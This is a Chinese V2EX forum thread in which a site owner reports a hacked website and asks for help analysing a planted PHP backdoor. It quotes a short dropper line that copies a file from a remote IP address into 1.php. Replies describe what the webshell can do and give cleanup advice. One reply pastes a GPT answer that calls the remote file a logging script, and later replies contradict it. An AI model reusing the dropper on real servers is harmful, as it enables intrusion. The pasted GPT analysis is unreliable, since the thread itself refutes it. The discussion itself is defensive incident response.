网站被挂后门,后面文件已找到,但是小弟我拿它没办法

2023-09-12 10:17:20 +08:00
 Epona

事情经过: 1 个小网站前几天都还登录过去,昨天登录后台竟然提示密码不对, 再试了 3 次一样提示,心里顿时不对劲,估计被黑了,立马返回网站首页查看源代码,果然被挂了 xx 内容,然后进宝塔进网站目录查看,发现了 1.php 文件。打开发现文件是 goto 加密,思考了片刻,还原不了。

例外在其他目录文件也发现了下面的片段:

<?php
$a="copy";
$a("http://23.251.35.165/as.txt","1.php");
?>

这个远程 txt 地址就是入侵者用来生成 1.php

请各路神仙帮忙分析分析,里面都装的啥内容,希望让更多的 v 友知道,预防一下 🙏

9757 次点击
所在节点    程序员
61 条回复
gam2046
2023-09-12 11:48:57 +08:00
这时候 GPT 才有意义了,毕竟人工分析还是困难的。虽然不一定全对,但是应该能分析个大概出来。

以下内容来自 GPT:

如果您查看这个网址的内容,您会发现它是另一个 PHP 脚本,它的内容是:

```
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$port = $_SERVER['REMOTE_PORT'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$ref = $_SERVER['HTTP_REFERER'];
$filename = $_SERVER['SCRIPT_NAME'];
$method = $_SERVER['REQUEST_METHOD'];
$data = $_SERVER['QUERY_STRING'];
$postdata = file_get_contents("php://input");
$cookies = $_SERVER['HTTP_COOKIE'];
$date = date("Y-m-d H:i:s");
$file = fopen("log.txt","a");
fwrite($file,"$date|$ip|$port|$agent|$ref|$filename|$method|$data|$postdata|$cookies\n");
fclose($file);
?>
```

这段代码的作用是将访问您网站的用户的一些信息记录到一个名为 log.txt 的文件中。这些信息包括用户的 IP 地址、端口号、浏览器信息、来源网址、访问的文件名、请求方法、查询字符串、POST 数据和 Cookie 等。
des
2023-09-12 11:53:56 +08:00
@gam2046 说明密码泄漏了,op 赶紧修改邮箱密码吧
hack
2023-09-12 11:55:20 +08:00
寄生虫刷外链?
MFWT
2023-09-12 11:56:29 +08:00
@javalaw2010 刚一下下来,火绒给我拦了,还得我手动信任
MFWT
2023-09-12 12:06:02 +08:00
看了一下内容,有点类似 Web 版中国菜刀,反正就是可以任意操作文件了
googlefans
2023-09-12 12:19:49 +08:00
这帮攻击别人网站的人真的垃圾不如
22too
2023-09-12 12:28:59 +08:00
先服务器重装吧。 然后安装最新版本软件。
其他的都是白折腾
Liftman
2023-09-12 12:52:07 +08:00
做网安的路过。浅讲两点,1 你需要做服务器扫描,确定系统层面没有问题,2 ,即使你恢复网站,也需要再做一次应用扫描,请人做渗透测试最好。问题也许发生在服务器上 也许是网站,也有可能是根本的业务逻辑漏洞。这些日常都很常见的。
MFWT
2023-09-12 13:36:07 +08:00
根据#9 反混淆后的代码补充:

这玩意可以通过 URL 参数指定一个远程网址获取内容并写入文件,所以赶紧检查下你的服务器有没有别的什么木马被一起下载下来了
lupus721
2023-09-12 13:57:08 +08:00
确定入口点是当务之急,反查木马都再说了。

根绝文件生成时间,看对应的访问日志,评估下从哪里进来的,然后再说安全狗之类的全盘扫描,杀杀 webshell 之类的。

当然可以做的另一个就是加个防火墙,如果对方用的常规的漏洞点,也能起到一定的防御作用。

无责任推荐长亭的防火墙,免费的就差不多够用
justfun
2023-09-12 14:14:18 +08:00

功能并不是很多,收藏了😁
samvvv
2023-09-12 14:18:53 +08:00
@justfun 图挂了
proxytoworld
2023-09-12 14:22:41 +08:00
不止你一个站被打过
proxytoworld
2023-09-12 14:24:37 +08:00
目测是灰产黑产把,重装系统把

![]( )
proxytoworld
2023-09-12 14:24:56 +08:00
@proxytoworld 点进去都是菠菜页面
easylee
2023-09-12 14:39:17 +08:00
@justfun #31 图挂了
TORYOI
2023-09-12 14:41:34 +08:00
找网站漏洞才是要紧的事,不然下次还得被黑,狗皮膏药一样清不完
opengps
2023-09-12 14:49:05 +08:00
这种一般不是靠防火墙进来的,而是通过你应用自身的漏洞进来的,大概率路径(我经历过一次):
1 ,你有上传入口,校验不够全面,能上传脚本类的文件
2 ,上传后文件,可以直接执行,或者可以间接从公网访问下构造的路径来执行
3 ,执行的代码,就是你列举的这段,外网构造过之后的新木马文件。
4 ,在你网站的这个路径下,可以打开这个后门网页
5 ,通过这种后门网页,可以操作你系统内的数据
yumusb
2023-09-12 15:07:08 +08:00
MFWT
2023-09-12 15:21:13 +08:00
@yumusb

看了看代码,应该不止 Admin001...这一个密码,还有一个(没有反查出来)的,两个都能登录
Admin001...更像是作者留的后门,因为发现了不管是直接写登录参数还是输入 Admin001...都能登录

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/972936

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX